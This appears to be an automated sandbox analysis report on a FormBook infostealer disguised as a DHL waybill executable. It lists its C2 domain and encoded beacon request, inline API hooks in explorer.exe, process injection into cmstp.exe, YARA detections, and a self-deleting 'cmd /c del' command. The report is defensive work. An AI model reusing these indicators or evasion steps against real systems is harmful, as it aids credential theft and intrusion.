                                    OriginalFilenameFixupD.exe
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 27, 2022 17:59:34.806126118 CEST4980080192.168.2.6185.53.179.171
                                    May 27, 2022 17:59:34.822361946 CEST8049800185.53.179.171192.168.2.6
                                    May 27, 2022 17:59:34.822493076 CEST4980080192.168.2.6185.53.179.171
                                    May 27, 2022 17:59:34.839256048 CEST8049800185.53.179.171192.168.2.6
                                    May 27, 2022 17:59:34.839370966 CEST4980080192.168.2.6185.53.179.171
                                    May 27, 2022 17:59:34.856012106 CEST8049800185.53.179.171192.168.2.6
                                    May 27, 2022 17:59:34.856033087 CEST8049800185.53.179.171192.168.2.6
                                    May 27, 2022 17:59:34.856046915 CEST8049800185.53.179.171192.168.2.6
                                    May 27, 2022 17:59:34.856256008 CEST4980080192.168.2.6185.53.179.171
                                    May 27, 2022 17:59:34.856282949 CEST4980080192.168.2.6185.53.179.171
                                    May 27, 2022 17:59:34.872529984 CEST8049800185.53.179.171192.168.2.6
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 27, 2022 17:59:34.761593103 CEST5269853192.168.2.68.8.8.8
                                    May 27, 2022 17:59:34.789715052 CEST53526988.8.8.8192.168.2.6
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    May 27, 2022 17:59:34.761593103 CEST192.168.2.68.8.8.80x1c6aStandard query (0)www.paycheckstubonlin.comA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    May 27, 2022 17:59:34.789715052 CEST8.8.8.8192.168.2.60x1c6aNo error (0)www.paycheckstubonlin.com185.53.179.171A (IP address)IN (0x0001)
                                    • www.paycheckstubonlin.com
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.649800185.53.179.17180C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 27, 2022 17:59:34.839370966 CEST7197OUTGET /183b/?3f=0pQLi&GTWHLhf=aeRI+VtYzSQE3A1d41SuiJFmY5rxFnxGMgk+ebPO7waK3tnPCQEIkRgDBSC82MoPtV6fY2DLrg== HTTP/1.1
                                    Host: www.paycheckstubonlin.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    May 27, 2022 17:59:34.856033087 CEST7197INHTTP/1.1 403 Forbidden
                                    Server: nginx
                                    Date: Fri, 27 May 2022 15:59:34 GMT
                                    Content-Type: text/html
                                    Content-Length: 146
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                    Code Manipulations

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xED
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xED
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xED
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xED

                                    Click to jump to process

                                    Target ID:0
                                    Start time:17:57:36
                                    Start date:27/05/2022
                                    Path:C:\Users\user\Desktop\DHL WB# 2343640950.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\DHL WB# 2343640950.exe"
                                    Imagebase:0x2b0000
                                    File size:708608 bytes
                                    MD5 hash:81E4012E3036BEFD629438ACE2E798E2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.425718736.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.423321322.0000000002797000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.425338191.0000000003855000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000000.00000002.428458566.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low

                                    Target ID:4
                                    Start time:17:57:56
                                    Start date:27/05/2022
                                    Path:C:\Users\user\Desktop\DHL WB# 2343640950.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\Desktop\DHL WB# 2343640950.exe
                                    Imagebase:0x270000
                                    File size:708608 bytes
                                    MD5 hash:81E4012E3036BEFD629438ACE2E798E2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    Target ID:5
                                    Start time:17:57:58
                                    Start date:27/05/2022
                                    Path:C:\Users\user\Desktop\DHL WB# 2343640950.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\DHL WB# 2343640950.exe
                                    Imagebase:0xd80000
                                    File size:708608 bytes
                                    MD5 hash:81E4012E3036BEFD629438ACE2E798E2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.508076221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.508816712.00000000012F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.417761109.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.417286385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.508664053.00000000012C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Target ID:8
                                    Start time:17:58:03
                                    Start date:27/05/2022
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Explorer.EXE
                                    Imagebase:0x7ff77c400000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.493111927.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.466672366.000000000EBB3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Target ID:13
                                    Start time:17:58:38
                                    Start date:27/05/2022
                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                    Imagebase:0x1250000
                                    File size:82944 bytes
                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.641809703.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.640957593.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.641933655.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:moderate

                                    Target ID:14
                                    Start time:17:58:45
                                    Start date:27/05/2022
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del "C:\Users\user\Desktop\DHL WB# 2343640950.exe"
                                    Imagebase:0xed0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:15
                                    Start time:17:58:47
                                    Start date:27/05/2022
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6406f0000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    No disassembly